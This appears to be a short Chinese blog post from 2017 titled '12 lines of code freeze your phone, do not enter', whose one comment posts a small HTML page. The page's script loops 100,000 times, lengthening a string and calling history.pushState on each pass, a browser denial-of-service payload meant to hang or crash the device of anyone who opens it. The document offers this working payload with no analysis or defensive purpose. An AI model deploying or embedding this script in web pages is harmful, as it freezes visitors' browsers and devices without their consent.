12行代码卡死手机,勿进!
2017-06-15 01:14:06 -0400
«Newer      Older»

----Comments(1)----
20722699 (@2072269947) | @ at 2017-07-08 04:02:
<html>
<body>
<script>
var total = " ";
for (var i = 0; i < 100000; i++)
{
total = total + i.toString();
history.pushState(0,0,total);
}
</script>
</body>
</html>
Comment:
Name:
Back to home 代码 /cat/111288